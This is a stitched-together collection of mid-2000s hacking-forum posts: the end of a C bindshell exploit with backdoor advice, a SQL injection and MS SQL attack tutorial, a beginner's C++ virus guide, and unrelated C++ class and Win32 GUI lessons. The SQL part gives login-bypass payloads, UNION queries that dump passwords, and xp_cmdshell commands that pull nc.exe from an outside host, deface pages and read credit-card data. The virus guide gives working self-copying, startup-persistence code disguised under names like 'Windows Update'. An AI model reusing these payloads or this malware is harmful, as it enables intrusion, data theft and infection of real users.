if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1)
{
perror("[-] Socket failed");
return(0);
}
if(connect(sockfd,(struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
{
printf("[-] Couldnt connect to bindshell, possible reasons:\n");
printf(" 1: Host is firewalled\n");
printf(" 2: Exploit failed\n");
return(0);
}
printf("[+] Connected to bindshell..\n\n");
sleep(2);
printf("-- bling bling --\n\n");
con(sockfd);
return(0);
}
*cough*it’s in C*cough*
2.5 Planting a backdoor
Ok, now what do we do? Let’s assume you’ve compromised the system you wanted to, and you’re in. You’ve done what you wanted to do, checked the vulnerabilities. Now, IF you do want to get back into the system in the future, planting a backdoor is the best way to go.(look at section 1.5 for reference) Later on, if you do not plant a back door, you have to go through the same trouble of executing the exploit, taking advantage of the vuln., and gaining more access. To make all this easier, you can plant a backdoor in the system directory or startup so you can conveniently connect to this computer again. The best backdoor is the self-programmed one. But it’s up to you on where/what to install. (check this website for viruses/backdoors , its decent : http://lbrary.2ya.com )
2.6 Automated Pen Testing
What is automated pen testing? It is a program designed to automatically access a system’s vulnerability, exploit it, and gain as much access to it. These softwares exist for the professionals who want to check the security of their website, network, server. Often, these softwares are VERY expensive and even demos require phone calls and stuff. (bleh, no w4r3z for j00) These softwares are a very useful tool for white hat hackers but if in the wrong hands, (for an example, in the hands of a 13 year old boy who wants to cause chaos) it’s a weapon.
These programs feature ip/port scanner, vulnerability scanner, exploits (executers of exploits), privilege escalation tools, more tools, more exploits, back doors, and report-maker. An example of an APT program is : CORE impact and immunity CANVAS.
www.coresecurity.com/products/coreimpact/index.php
www.immunitysec.com/products-canvas.shtml
As I said before, these tools are very expensive and I doubt you can get one tongue.gif. However, there is a excellent APT program that is FREE : as in 100% percent free. Metasploit. This program includes more than a hundred exploits and more then fifty payloads to use. IT automates using exploits and payloads, along with easily configured settings. This tool is very nifty especially because it’s free, and I recommend you to get one.(Also, it’s always updating)
www.metasploit.com
3. Credits
Credits: ME! MUHAHAH ME AND MYSELF AND ME ONLY! (and those who taught me these stuff biggrin.gif)
List of sites:
Proxy:
http://www.samair.ru/proxy/
http://www.publicproxyservers.com/
Port Reference
http://www.iana.org/assignments/port-numbers
Collection of [shitty] tools:
http://library.2ya.com
t3h l33t spl0its sites:
http://www.metasploit.com/
http://www.milw0rm.com/
http://www.securiteam.com/exploits/
http://www.iss.net/security_center/advice/...its/default.htm
http://zone-h.com/
http://www.antiserver.it/
http://www.frsirt.com/exploits/
http://packetstormsecurity.org/
http://exploits-lab.info/index.php
http://archives.neohapsis.com/archives/fulldisclosure/
http://d3fonix.uni.cc/
http://www.cert.org/nav/index_red.html
http://www.governmentsecurity.org/exploits.php
http://www.hoobie.net/security/exploits/
http://www.hackemate.com.ar/exploits/
http://www.insecure.org/sploits.html
HTTP://WWW.GOOGLE.COM
Good Sites:
http://www.rohitab.com/discuss
http://en.wikipedia.org
APT sites:
www.metasploit.com
www.coresecurity.com/products/coreimpact/index.php
www.immunitysec.com/products-canvas.shtml
//THANKS FOR READING THIS//
Turley
Aug 19 2006, 10:32 AM
Very nice tutorial DABUKE biggrin.gif
TrU Smoke
Aug 19 2006, 12:45 PM
QUOTE(Turley @ Aug 19 2006, 10:32 AM) *
Very nice tutorial DABUKE biggrin.gif
yup
Bloodrager
Aug 19 2006, 03:36 PM
There's a lot more to hacking then that.
Otherwise, it is a good tootariel for the noob-a-joobs.
Pazuzu_
Aug 21 2006, 01:00 AM
good stuff
Dabuke
Aug 21 2006, 04:22 AM
QUOTE(Bloodrager @ Aug 19 2006, 03:36 PM) *
There's a lot more to hacking then that.
Otherwise, it is a good tootariel for the noob-a-joobs.
Der biggrin.gif it's called nublet's hand manual,.. and I mentioned it only has basic stuff smile.gif
thanks for the comments though
Norpsel
Sep 14 2006, 11:37 PM
As a noob, I found this article extremely helpful and am currently bookmarking it. I really appreciate the time and effort you put into this to help people like myself.
Thanks a bunch,
Norpsel
cHiNtOfIsT
Sep 16 2006, 04:50 AM
Thank you very much I am just learning how to program in c and this manual has been very helpful.
LoX
Sep 16 2006, 12:39 PM
Because you're both noobs, Just a little note : Don't post on a topic over 1 week old unless you have something major to contribute.
MetalHead
Sep 19 2006, 08:16 PM
No, I've seen people get flamed even when they brought up alot of great points that the thread had failed to mention. Granted the thread was almost a year old but yeah...
sub7recon
Sep 23 2006, 08:42 PM
I guess I better start asking friends for war3z downloadz then smile.gif
SiM
Sep 23 2006, 11:22 PM
QUOTE(LoX @ Sep 16 2006, 01:39 PM) [snapback]158217[/snapback]
Because you're both noobs, Just a little note : Don't post on a topic over 1 week old unless you have something major to contribute.
A week or two wouldn't really bother anyone. If it was a month or so, then that's a different story.
Dabuke
Oct 14 2006, 11:54 PM
I know this post is quite old and all, but i just wanted to add that
if you need source codes of virii and botnets and whatnots,
just pm me and I'll help you. But i don't want to make is SO public that every nubajub will get
a freaking bot net.. so
Feky
Oct 16 2006, 09:43 AM
good smile.gif
----------------------------------
For more info please visit: Vicisolutions.com
Databases have been the heart of a commercial website. An attack on the database servers can cause a great monetary loss for the company. Database servers are usually hacked to get the credit card information. And just one hack on a commercial site will bring down its reputation and also the customers as they also want their credit card info secured. Most of the commercial websites use Microsoft sql (MSsql) and Oracle database servers. MS sql still owns the market because the price is very low. While Oracle servers come with high price. Well some time ago Oracle had claimed itself to be "unbreakable" But hackers took it as a challenge and showed lots of bugs in it also !! I was addicted to hacking of database servers from a few months. So I just decided to share the knowledge with others. Well the things discussed here are not discovered by me ok. Yeah I experimented with them a lot.
The article is divided into two parts:
1. Using the HTTP port 80
2. Using the MS SQL port 1434
Part I - Using HTTP port 80 ( Or better would be malformed URLs)
----------------------------------------------------------------
This part will be useful not only to the hackers but also to the web designers. A common mistake made by the web designers can reveal the databases of the server to the hacker. Lets see on it. The whole game is of query strings. So it is assumed that the reader has some knowledge about queries and asp. And one more thing. This hack is done using only through the browser. So you even don't require any other tools except IE or Netscape.
Normally, inorder to make a login page, the web designer will write the following code.
login.htm
<html>
<body>
<form method=get action="logincheck.asp">
<input type="text" name="login_name">
<input type="text" name="pass">
<input type="submit" value="sign in">
</form>
</body>
</html>
logincheck.asp
<@language="vbscript">
<%
dim conn,rs,log,pwd
log=Request.form("login_name")
pwd=Request.form("pass")
set conn = Server.CreateObject("ADODB.Connection")
conn.ConnectionString="provider=microsoft.jet.OLEDB.4.0;data source=c:\folder\multiplex.mdb"
conn.Open
set rs = Server.CreateObject("ADODB.Recordset")
rs.open "Select * from table1 where login='"&log& "' and password='" &pwd& "' ",conn
If rs.EOF
response.write("Login failed")
else
response.write("Login successful")
End if
%>
Looking at the above code at first site it seems OK. A user will type his login name and password in login.htm page and click the submit button. The value of the text boxes will be passed to the logincheck.asp page where it will be checked using the query string. If it doesn't get an entry satisfying the query and will reach end of file a message of login failed will be displayed. Every thing seems to be OK. But wait a minute. Think again. Is every thing really OK ?!! What about the query ?!! Is it OK. Well if you have made a page like this then a hacker can easily login successfully without knowing the password. How ? Lets look at the querry again.
"Select * from table1 where login='"&log& "' and password='" &pwd& "' "
Now if a user types his login name as "Chintan" and password as "h4x3r" then these values will pass to the asp page with post method and then the above query will become
"Select * from table1 where login=' Chintan ' and password=' h4x3r ' "
Thats fine. There will be an entry Chintan and h4x3r in login and password fields in the database so we will receive a message as login successful.
Now what if I type loginname as "Chintan" and password as
hi' or 'a'='a
in the password text box ? The query will become as follows:
"Select * from table1 where login=' Chintan ' and password=' hi' or 'a'='a ' "
And submit and bingo!!!!! I will get the message as Login successful !! Did you see the smartness of hacker which was due to carelessness of web designer ? !!
The query gets satisfied as query changes and password needs to 'hi' or 'a' needs to be equal to 'a'. Clearly password is not 'hi' but at the same time 'a'='a' . So condition is satisfied. And a hacker is in with login "Chintan" !! You can try the following in the password text box if the above doesn't work for some websites:
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
Here above -- will make the rest of the query string to be a comment other conditions will not be checked. Similary you can provide
Chintan ' --
Chintan " --
or such types of other possibilites in the login name textbox and password as anything which might let you in. Because in the query string only login name is checked as "Chintan" and rest is ignored due to --. Well if you are lucky enough you get such a website were the webdesigner has done the above mistake and then you will be able to login as any user !!!
IMP NOTE: Hey guys I have put up a page where you can experiment for yourself about the sql injection vulnerablity. Just go to www33.brinkster.com/chintantrivedi/login.htm
More advance hacking of Databases using ODBC error messages!!!
Above we saw as to how login successfully without knowing password. Now over here I will show you how to read the whole database just by using queries in the URL !! And this works only for IIS i.e asp pages. And we know that IIS covers almost 35% of the web market. So you will definitely get a victim just after searching a few websites. You might have seen something like
http://www.nosecurity.com/mypage.asp?id=45
in the URLs. '?' over there shows that after it, 45 value is passed to a hidden datatype id. Well if you don't understand then as we have seen in the above example in the login.htm, having two input text types with names 'login_name' and 'pass' and there values were passed to logincheck.asp page. The same thing can be done by directly opening the logincheck.asp page using
http://www.nosecurity.com/logincheck.asp?l...&pass=h4x3r
in the URL if method="get" is used instead of method="post".
Note : <form method=post> or <form method="get"> Difference between get and post method is that post method doesn't show up values passed to next paged in the url while get method shows up the values. To get more understanding of how they internally work read HTTP protocol RFC 1945 and RFC 2616.
What i mean to say is that after '?' the variables which are going to be used in that page are assigned the values. As above login_name is given value Chintan. And different variables are separated by operator '&'.
OK so coming back, id will mostly be hidden type and according to the links you click its value will change. This value of id is then passed in the query in mypage.asp page and according tothe results you get the desired page at your screen. Now if just change the value of id as 46 then you will get different page.
Now lets start our hacking the database. Lets use the magic of queries. Just type
http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
in the URL. INFORMATION_SCHEMA.TABLES is a system table and it contains information of all the tables of the server. In that there is field TABLE_NAME which contains names of all the tables. See the query again
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES
The result of this query is the first table name from INFORMATION_SCHEMA.TABLES table. But the result we get is a table name which is a string(nvarchar) and we are uniting it with 45(integer) by UNION. So we will get an error message as
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'logintable' to a column of data type int. /mypage.asp, line
From the error its clear that first table is 'logintable'. It seems that this table might contain login names and passwords :-) So lets move in it. Type the following in the URL
http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable'--
output
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'login_id' to a column of data type int.
/index.asp, line 5
The above error message shows that the first field or column in logintable is login_id. To get the next column name will type
http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id')--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'login_name' to a column of data type int.
/index.asp, line 5
So we get one more field name as 'login_name'. To get the third field name we will write
http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id','login_name')--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'passwd' to a column of data type int.
/index.asp, line 5
Thats it. We ultimately get the 'passwd' field. Now lets get the login names and
passwords from this table "logintable". Type
http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 login_name FROM logintable--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'Rahul' to a column of data type int.
/index.asp, line 5
Thats the login name "Rahul" and to get the password of Rahul the query would be
http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 password FROM logintable
where login_name='Rahul'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'P455w0rd' to a column of data type int.
/index.asp, line 5
Voila!! login name: Rahul and password: P455w0rd. You have cracked the database of
www.nosecurity.com And's it was possible to the request of user was not checked properly. SQL
vulnerabilities still exist on many websites. The best solution is to parse the user requests and
filter out some characters as ',",--,:,etc.
Part II - using port 1434 (SQL Port)
-------------------------------------
Well uptill now we had seen how to break the database using the malformed URLs But that was done using just port 80 (http port) But this time we would use the port 1434 for hacking. Before that we will see what actually database servers are and how do they work and then how to exploit them !
The designers of MS sql gave some default stored procedures along with the product to make things flexible to the webdesigners. The procedure is nothing but functions which can used to perform some actions on the arguments passed to them. This procedures are very important to hackers. Some of the important ones are
sp_passsword -> Changes password for a specific login name.
e.g. EXEC sp_password 'oldpass', 'newpass', 'username'
sp_tables -> Shows all the tables in the current database.
e.g. EXEC sp_tables
xp_cmdshell -> Runs arbitary command on the machine with administrator privileges. (most imp)
xp_msver -> Shows the MS SQL server version including the all info about the OS.
e.g. master..xp_msver
xp_regdeletekey -> Deletes a registry key.
xp_regdeletevalue ->Delets a registry value
xp_regread -> Reads a registry value
xp_regwrite -> Writes a registry key.
xp_terminate_process -> Stops a process
Well these are some important procedures. Actually there are more than 50 such types of procedures. If you want your MS SQL server to be protected then I would recommend to delete all of these procedures. The trick is open the Master database using MS SQL Server Enterprise Manager. Now expand the Extended Stored Procedures folder and delete the stored procedure by right click and delete.
Note: "Master" is an important database of the SQL server which contains all system information like login names and system stored procedures. So if a hacker deletes this master database then the SQL server will be down for ever. Syslogins is the default system table which contains the usernames and passwords of logins in the database.
Most dangerous threat : The Microsoft SQL server has default username "sa" with password blank "". And this has ruined lots of MS sql servers in the past. Even a virus regarding this vulnerability had been released.
Thatz enough. Lets hack now. First we need to find out a vulnerable server. Download a good port scanner (many out there on web ) and scan for ip addresses having port 1433/1434 (tcp or udp) open. This is the MS Sql port which runs the sql service. Oracle's port no. is 1521. Lets suppose we got a vulnerable server with ip 198.188.178.1 (its just an example so don't even try it) Now there are many ways to use the SQL service. Like telnet or netcat to port no. 1433/1434. You can also use a tool known as osql.exe which ships with any SQL server 2000. Okz. Now go to dos prompt and type.
C:\>osql.exe -?
osql: unknown option ?
usage: osql [-U login id] [-P password]
[-S server] [-H hostname] [-E trusted connection]
[-d use database name] [-l login timeout] [-t query timeout]
[-h headers] [-s colseparator] [-w columnwidth]
[-a packetsize] [-e echo input] [-I Enable Quoted Identifiers]
[-L list servers] [-c cmdend]
[-q "cmdline query"] [-Q "cmdline query" and exit]
[-n remove numbering] [-m errorlevel]
[-r msgs to stderr] [-V severitylevel]
[-i inputfile] [-o outputfile]
[-p print statistics] [-b On error batch abort]
[-O use Old ISQL behavior disables the following]
<EOF> batch processing
Auto console width scaling
Wide messages
default errorlevel is -1 vs 1
[-? show syntax summary]
Well, this displays the help of the osql tool. Its clear from the help what we have to do now. Type
C:\> osql.exe -S 198.188.178.1 -U sa -P ""
1>
Thats what we get if we login successfully else we will get an error message as login failed for user "sa"
Now if we want to execute any command on the remote machine then just use the "xp_cmdshell" default stored procedure.
C:\> osql.exe -S 198.188.178.1 -U sa -P "" -Q "exec master..xp_cmdshell 'dir >dir.txt'"
I would prefer to use -Q option instead of -q because it exits after executing the query. In the same manner we can execute any command on the remote machine. We can even upload or download any files on/from the remote machine. A smart attacker will install a backdoor on the machine to gain access to in future also. Now as I had explained earlier we can use the "information_schema.tables" to get the list of tables and contents of it.
C:\> osql.exe -S 198.188.178.1 -U sa -P "" -Q "select * from information_schema.tables"
And getting table names look for some table like login or accounts or users or something like that which seems to contain some important info like credit card no. etc.
C:\> osql.exe -S 198.188.178.1 -U sa -P "" -Q "select * from users"
And
C:\> osql.exe -S 198.188.178.1 -U sa -P "" -Q "select username, creditcard, expdate from users"
Output:
Username creditcard expdate
----------- ------------ ----------
Jack 5935023473209871 2004-10-03 00:00:00.000
Jill 5839203921948323 2004-07-02 00:00:00.000
Micheal 5732009850338493 2004-08-07 00:00:00.000
Ronak 5738203981300410 2004-03-02 00:00:00.000
Write something in index.html file ?
C:\> osql.exe -S 198.188.178.1 -U sa -P "" -Q "exec master..xp_cmdshell 'echo defaced by Chintan > C:\inetpub\wwwroot\index.html'"
Wanna upload any file on the remote system.
C:\> osql.exe -S 198.188.178.1 -U sa -P "" -Q "exec master..xp_cmdshell 'tftp 203.192.16.12 GET nc.exe c:\nc.exe'"
And to download any file we can use the PUT request instead of GET Its just because this commands are being executed on the remote machine and not on ours. So if you give the GET request the command will be executed on the remote machine and it will try to get the nc.exe file from our machine to the remote machine.
Thatz not over. Toolz for hacking the login passwords of Sql servers are easily available on the web. Even many buffer overflows are being discovered which can allow user to gain the complete control of the sytem with administrator privileges. The article is just giving some general issues about database servers.
Remember the Sapphire worm? Which was released on 25th Jan. The worm which exploited three known vulnerabilities in the SQL servers using 1433/1434 UDP ports.
Precautionay measures
---------------------------
<*> Change the default password for sa.
<*> Delete all the default stored procedures.
<*> Filter out all the characters like ',",--,:,etc.
<*> Keep upto date with patches
<*> Block the ports 1433/1434 MS SQL and 1521 (oracle) ports using firewalls.
------------------------------
Smith Guide to simple C++ Viruses
Ok first off I’d like to say 2 things:
1. This guide is only intended for people who want to learn
2. I don’t condone releasing viruses in any way
Taking the above into consideration I’d like to say welcome to the world of virus programming I’m hoping upon reading this you well become as fascinated by viruses as I am and continue to study and write new unique viruses.
Most of the virus writing guides I’ve seen are lengthy, boring and out of date, this guide will try to be the opposite short, fun and to the point. Now this is what you will need to start programming:
Win32 API Reference <- Not Required but very helpful
A C++ Compiler – I Recommend DEV for people who do not wish to buy and Microsoft Visual C++ 6.0 for people with money and serious programmers, however DEV works fine.
Even if you have never programmed before you should be able to carry along with this one, but it helps if you know a little bit of C++.
Ok lets begin fire up DEV or MSVC and select new Win32 GUI for DEV users and Win32 for MSVC. Now with DEV it makes some generated code for GUI apps, delete it all leaving something like this:
QUOTE
#include <windows.h>
int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE PrevInstance,
LPSTR lpszArgument, int nFunsterStil)
{
return 0;
}
Now compile and run the code nothing should happen (if a black window pops up it means you didn’t goto win32) The reason nothing happened is because or program doesn’t do anything. It runs and exits we need to make it do something first of all add this code to the project in between the { } and before return 0;.
MessageBox(NULL,”Hello”,”Messagebox Example”,MB_OK);
Now compile and run the program again A message box should pop up, cool ay? But its not much of a virus lets make it do some cool stuff. Add the following code to your project:
QUOTE
char system[MAX_PATH];
char pathtofile[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);
GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectory(system,sizeof(system));
strcat(system,”\\virus.exe”);
CopyFile(pathtofile,system,false);
MessageBox(NULL,”Hello”,”Messagebox Example”,MB_OK);
Once again make sure the code is before return 0; and the { }.Ok compile and run the code, now open up the system32 directory in you windows folder (for those who don’t know goto run in the startbar and type: %windir%\system32
Ok look for a file called virus.exe in the system32 folder. Don’t believe me that its our virus? Run the file it should come up with a message box saying “Hello”.
Cool is it not? Ok time to explain how this works:
char sytem[MAX_PATH]; This is the buffer to hold the system32 directory.
char pathtofile[MAX_PATH]; This is the buffer to hold the path to our virus.
HMODULE GetModH = GetModuleHandle(NULL); This one my be hard to grasp for some but bare with me. GetModH holds the handle to our virus GetModuleHandle() gets the handle and stores it there.
GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile)); This gets the FileName of our virus using the handle we got before and storing the path to it in pathtofile.
GetSystemDirectory(system,sizeof(system)); Basically this finds out what your system directory is. Remember not everyone’s window’s directory is c:\windows\system32. Mine is d:\winnt\system32 on this box, the reason for this is we want to copy to an existent system32 directory.
strcat(system,”\\virus.exe”); Ok we have the system32 directory c:\windows\system32 or whatever now we need a place to copy to. This function binds to strings together to form one. So our system buffer now says:
c:\windows\system32\virus.exe or whatever the case maybe. Note \\ is not a typo \\ is how c++ interprets \. A single \ is seen by c++ as an escape character and if you have one your virus will not work!
CopyFile(pathtofile,system,false); Pretty self explanatory copy from were our virus is to were we want it to be. What false means if virus.exe already exists it will copy over it, to stop this change false to true (leave it as false for this tutorial).
Ok that’s it next we are going add code so it will startup when the computer boots. We are going to use an 3 API calls to accomplish this
RegOpenKeyEx(); This opens the key we want to write to
RegSetValueEx(); This sets our value
RegCloseKey(); This closes the key
Time to add code to our fledgling virus:
QUOTE
HKEY hKey;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );
RegSetValueEx(hKey, "Writing to the Registry Example",0,REG_SZ,(const unsigned char*)system,sizeof(system));
RegCloseKey(hKey);
Ok obviously this is going to need an more of an explanation than before. HKEY hKey is the buffer that holds the data for calls to the registry nothing else about this except you need it. RegOpenKeyEx Opens the key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run this is the key for starting up for all users which is what we want. 0 is reserved and needs to stay 0. We want to open up the key with set permissions that’s why we use KEY_SET_VALUE. And then we add the buffer.
The next call: hKey is the buffer “Writing to the registry example” is the message to appear in the key you can change this to something less obviously like “Windows Update” or “Norton Security Shield” anyway be creative. The next zero is the same as above reserved needs to stay 0. REG_SZ is the type of key we want. There are other types like REG_BINARY and REG_DWORD but we are using REG_SZ which is for text. (const unsigned char*) formats our string to a const unsigned char * because it doesn’t accept normal chars. system is the buffer that holds the path to our virus and the final part is the size of the string, this is calculated automatically by using sizeof.
The next call closes the registry key.
Ok add this to you code so it looks something like:
QUOTE
#include <windows.h>
int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE PrevInstance,
LPSTR lpszArgument, int nFunsterStil)
{
char system[MAX_PATH];
char pathtofile[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);
GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectory(system,sizeof(system));
strcat(system,”\\virus.exe”);
CopyFile(pathtofile,system,false);
HKEY hKey;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );
RegSetValueEx(hKey, "Writing to the Registry Example",0,REG_SZ,(const unsigned char*)system,sizeof(system));
RegCloseKey(hKey);
return 0;
}
Now run you code and open up regedit and browse to HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run there should be a new key in the area to the right our key!
Now comes the fun part of writing a virus the payload! This could be anywhere from a DdoS to making the cursor jump around the screen. Note destructive payloads are lame and frowned upon by the virus community, so do you self a favour and get the idea of destroying computers out of your mind. Besides writing a non destructive payload is more fun. Lets go with a payload I’ve written and christened The Flasher.
Your code should now look like this with the payload attached:
QUOTE
#include <windows.h>
int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE PrevInstance,
LPSTR lpszArgument, int nFunsterStil)
{
char system[MAX_PATH];
char pathtofile[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);
GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectory(system,sizeof(system));
strcat(system,”\\virus.exe”);
CopyFile(pathtofile,system,false);
HKEY hKey;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );
RegSetValueEx(hKey, "Writing to the Registry Example",0,REG_SZ,(const unsigned char*)system,sizeof(system));
RegCloseKey(hKey);
HWND hWin;
hWin = FindWindow("Shell_TrayWnd",NULL);
EnableWindow(hWin,false);
while(1==1)
{
ShowWindow(hWin,false);
Sleep(1000);
ShowWindow(hWin,true);
Sleep(1000);
}
return 0;
}
Although small don’t underestimate this payload it is very annoying try it. To fix your startbar ctrl-alt-delete find virus.exe end the process. Then find explorer.exe end it. Finally while still in task manager goto file run and type “explorer.exe” without the quotes. If that doesn’t work change EnableWindow and ShowWindow to true instead of false, remember to change it back later though.
That’s it for now I’ll go in depth about Finding Windows and such next time. I’ll also teach you how to kill taskmanager. Keep experimenting there are hundreds of API calls you can use try them out. If you run into an error try and figure out what went wrong 95% of all errors are spelling mistakes.
Keep Programming,
Smith
Contact: got_sasser@hotmail.com
--------------------------
Hello, I am jackhole, if you do not already know me, and I have been programming C and C++ for 3 years now. In this tutorial, my first, I will teach you how classes work in C++. Now let's begin
What are classes?
Plain and simply classes are a way of organizing data. Classes were introduced to C++ as part of the OOP (object oriented programming) concept. Classes are similar to structures, if you are familiar with structures classes will be of no problem to you.
How do I create a class?
The way you create a class is by using the class keyword. For example if I were going to create a class called test I would use
CODE
class test {
public:
void helloworld()
{
cout << "Hello world";
}
};
This might already start to confuse you, don't worry I will explain.
Essentially every class has to have a set of permission labels, in this case I set the permission label to public; you can have more than one permission label in a class. You might be wondering, what in the heck are permission labels? Let me explain:
The permission label public declare that the members of the class, such as void helloworld() are accessible anywhere the class is visible.
There are other permission labels such as:
private Members of class are only accessible from other members of their own class, like the class test for example.
protected members are accessible from members of their own class, again like test, and also from members of their derived classes.
How do I execute code from a class?
When you are wanting to access variables, or execute code from a class you must create an object of the class. Below is a full working example of how to access the class test, create an object, and execute void helloworld():
CODE
#include <iostream>
using namespace std;
class test {
public:
void helloworld()
{
cout << "Hello world";
}
};
main()
{
test testing; //create an object of test
testing.helloworld(); //execute helloworld
}
Wonderful, if everything went according to plan you should have seen "Hello World" appear in the console when you executed the program. In the code you will have seen that I used . between testing and helloworld, basically what that is saying is access helloworld through the class test and execute it.
Using the Scope operator
You are probably asking youself, what in the world is a scope operator. Well basically it looks something like this ::
The scope operator is used to specify the class of which the member belongs. We will take the same class, test, and use the scope operator for void helloworld to declare it a member of test. Below is a full working example of what I am talking about:
CODE
#include <iostream>
using namespace std;
class test {
public:
void helloworld(); //helloworld is a member of the class "test"
};
void test::helloworld() //specify that helloworld is now a member of the class test.
{
cout << "Hello World";
}
main()
{
test testing; //create an object of test
testing.helloworld(); //execute helloworld
}
You should have seen the same thing when you executed it this time, it should have displayed "Hello World" in the console if everything has went according to plan.
Finally, Constructors and Destructors.
A constructor is basically a way of declaring a member with the exact same name as the class. When you create an object of the class the constructor is instantly called. Below is a full example of the use of constructors.
CODE
#include <iostream>
using namespace std;
class test{ //create our class test
int firstnum, secondnum;
public: //the permission label
test(int x,int y) //THE CONSTRUCTOR
{
firstnum=x; //declare the firstnum variable is equal to the fist number inputed in the constructor
secondnum=y; //same as above ^
}
int sum()
{
return (firstnum+secondnum); // add the two numbers and exit the function
}
};
main()
{
test testing(5,4); //create an object of test which effectively initializes the constructor
cout << "The sum of your two numbers is " << testing.sum(); // spit out the sum of the two numbers to the console
}
Simply the way to describe a destructor is its the opposite of a constructor, it frees up allocated memory of the object you created. The destructors have the ~ prefix before their function name.
CODE
#include <iostream>
using namespace std;
class test {
int *firstnum, *secondnum;
public:
test (int,int);
~test ();
int sum() {
return (*firstnum + *secondnum);
}
};
test::test (int x, int y) {
firstnum= new int;
secondnum = new int;
*firstnum = x;
*secondnum = y;
}
test::~test () {
delete firstnum; //free up the allocated memory of the firstnumber
delete secondnum; // same as above ^
}
main()
{
test testing(5,4); //create an object of test which effectively initializes the constructor
cout << "The sum of your two numbers is " << testing.sum(); // spit out the sum of the two numbers to the console
}
Well this concludes it for my tutorial on classes. If you are having trouble you are free to PM me anytime you please. OOP takes practice. I have just covered the basics, there is more to learn like polymorphism, overloading constructors, abstraction, pointers to classes. Anyway, I am glad you have taken time to read my tutorial on Classes in C++
----------------------------
Help - Search - Members - Calendar
Full Version: C++ Win32 GUI Tutorial Part 2
rohitab.com - Forums > Community > Tutorials
darkblue
Nov 23 2004, 03:32 AM
++++++++++++++++++++++++++++++++++
Topic: C++ Win32 GUI Tutorial Part 2
Written by: darkblue
Date: 22 Nov. 2004
++++++++++++++++++++++++++++++++++
>Introduction:
Before reading this tutorial, it is highly recommended that you browse through Part 1 which can be found here: here and here: here
OK, now let's get started!
>Skeleton of a Win32 proggie:
CODE
#include <windows.h>
LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);
static char gszClassName[] = "darkblue";
static HINSTANCE ghInstance = NULL;
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
WNDCLASSEX WndClass;
HWND hwnd;
MSG Msg;
ghInstance = hInstance;
WndClass.cbSize = sizeof(WNDCLASSEX);
WndClass.style = NULL;
WndClass.lpfnWndProc = WndProc;
WndClass.cbClsExtra = 0;
WndClass.cbWndExtra = 0;
WndClass.hInstance = ghInstance;
WndClass.hIcon = LoadIcon(NULL, IDI_APPLICATION);
WndClass.hCursor = LoadCursor(NULL, IDC_ARROW);
WndClass.hbrBackground = (HBRUSH)(COLOR_WINDOW+1);
WndClass.lpszMenuName = NULL;
WndClass.lpszClassName = gszClassName;
WndClass.hIconSm = LoadIcon(NULL, IDI_APPLICATION);
if(!RegisterClassEx(&WndClass)) {
MessageBox(0, "Window Registration Failed!", "Error!", MB_ICONSTOP | MB_OK);
return 0;
}
hwnd = CreateWindowEx(
WS_EX_STATICEDGE,
gszClassName,
"darkblue owNz!",
WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT, CW_USEDEFAULT,
320, 240,
NULL, NULL,
ghInstance,
NULL);
if(hwnd == NULL) {
MessageBox(0, "Window Creation Failed!", "Error!", MB_ICONSTOP | MB_OK);
return 0;
}
ShowWindow(hwnd, nCmdShow);
UpdateWindow(hwnd);
while(GetMessage(&Msg, NULL, 0, 0)) {
